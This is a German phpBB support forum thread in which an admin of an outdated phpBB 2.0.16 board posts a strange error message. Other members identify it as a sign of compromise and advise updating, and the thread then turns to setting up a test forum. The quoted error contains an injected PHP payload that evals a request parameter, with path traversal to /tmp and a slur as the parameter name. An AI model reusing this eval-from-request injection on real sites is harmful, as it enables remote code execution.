Fehlermeldung phpBB: Kritscher Fehler

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
Elektron
Mitglied
Beiträge: 128
Registriert: 10.01.2005 21:42

Fehlermeldung phpBB: Kritscher Fehler

Beitrag von Elektron »

Hallo,

betreibe seit einem Jahr ein Forum mit der Version 2.0.16 ohne größere Probleme. Ein User berichtet mir per Mail folgenden Fehler:

Code: Alles auswählen

phpBB : Kritischer Fehler 

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 371
File : functions.php 
Dieser Fehlercode tritt sowie mit dem IE als auch mit dem Mozilla Firefox auf.
Den Fehler hat nur dieser User. Es gibt keine weiteren Reklamationen.

Wer kann mir weiterhelfen?

Danke

Gruß Elektron
Benutzeravatar
BraveEagle
Mitglied
Beiträge: 1884
Registriert: 16.01.2003 18:05
Wohnort: born 2 be a Paelzer
Kontaktdaten:

Beitrag von BraveEagle »

da wurde dein Forum gehackt.
KB:gehackt

Alternativ das hier "abarbeiten" incl. der Updates :wink:
http://www.phpbb.de/viewtopic.php?t=83813
Elektron
Mitglied
Beiträge: 128
Registriert: 10.01.2005 21:42

Beitrag von Elektron »

Hallo,
danke erstmal für die schnelle wenn auch nicht erfreuliche Nachricht!

Bist Du Dir da wirklich sicher? Durch was siehst du dass das Forum gehackt ?

Wieso tritt dies dann nur bei diesem einem User auf?
Ich möchte das Forum derzeit nicht vom Netz nehmen.

Wie sehen das die Anderen hier?

Gruß Elektron
Benutzeravatar
BraveEagle
Mitglied
Beiträge: 1884
Registriert: 16.01.2003 18:05
Wohnort: born 2 be a Paelzer
Kontaktdaten:

Beitrag von BraveEagle »

Elektron hat geschrieben: Bist Du Dir da wirklich sicher? Durch was siehst du dass das Forum gehackt ?
Weil ich die Forumsuche genutzt habe und da dein Forum ne alte Version ist:

http://www.phpbb.de/viewtopic.php?t=101 ... onfig+file
http://www.phpbb.de/viewtopic.php?t=997 ... onfig+file
http://www.phpbb.de/viewtopic.php?t=102729&start=0
usw.

Sorry, aber das sieht eindeutig aus :-?
Elektron
Mitglied
Beiträge: 128
Registriert: 10.01.2005 21:42

Beitrag von Elektron »

Hallo,

ich habe es zwar nicht für Richtig gehalten, aber es scheint wirklich so zu seinen mit dem Hack!
Habe heute Nacht das Forum auf 2.0.19 update gemacht mit viel Schweiß und Blut. Nun läuft das Forum wieder (Bis auf die fehlenden Mods).
Danke nochmals für die sehr schnelle Hilfe!

Aufgrund diesem Vorfall bin ich mir gerade am Überlegen, ob ich nicht doch die Forum Software offline auf einen PC installiere um dort in aller Ruhe alle nötigen Änderungen durchführe und dann dies einfach auf den WEB-Server kopiere. Am laufenden Forum tue ich mir eben recht schwer!
(Never change a runing system!)

Geht dies so einfach wie ich es mir denke oder gibts da doch gewisse Hürden für jemand wie ich der kein Programmierer ist?

Gruß Elektron
Benutzeravatar
BraveEagle
Mitglied
Beiträge: 1884
Registriert: 16.01.2003 18:05
Wohnort: born 2 be a Paelzer
Kontaktdaten:

Beitrag von BraveEagle »

Ich habe einfach mein Forum geklont und eine testarea angelegt. bevor ich dann was an meinem forum ändere, probier ich das erst in der testarea aus.
Elektron
Mitglied
Beiträge: 128
Registriert: 10.01.2005 21:42

Beitrag von Elektron »

ja schon klar aber liegt diese Testarea bei Dir auf dem PC oder einem Offline-Server oder direkt beim Provider im Webspace?

Wäre es im Webspace brauchst du ja eine zweite Datenbank?

Liegt es Lokal brauchst du ja dort auch eine MySQL-Datenbank?

Oder verwechsle ich hier mal wieder was?

Gruß Elektron
Benutzeravatar
BraveEagle
Mitglied
Beiträge: 1884
Registriert: 16.01.2003 18:05
Wohnort: born 2 be a Paelzer
Kontaktdaten:

Beitrag von BraveEagle »

Sorry vergessen dazuzuschreiben. Das Testforum liegt auf einer subdomain und hat eine andere DB. Kannst ja aber auch die gleiche nehmen und nur ein andres präfix nutzen ;)
Elektron
Mitglied
Beiträge: 128
Registriert: 10.01.2005 21:42

Beitrag von Elektron »

da ziehe ich es glaub doch eher vor das ganze offline auf einem eigenen WEB-Server zuhause einzurichten. Bei einer ISDN-Anbindung wohl eher das Vernüftigere!
Hat drin jemand Erfahrungen bzw. Hilfen?

Gruß Elektron
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“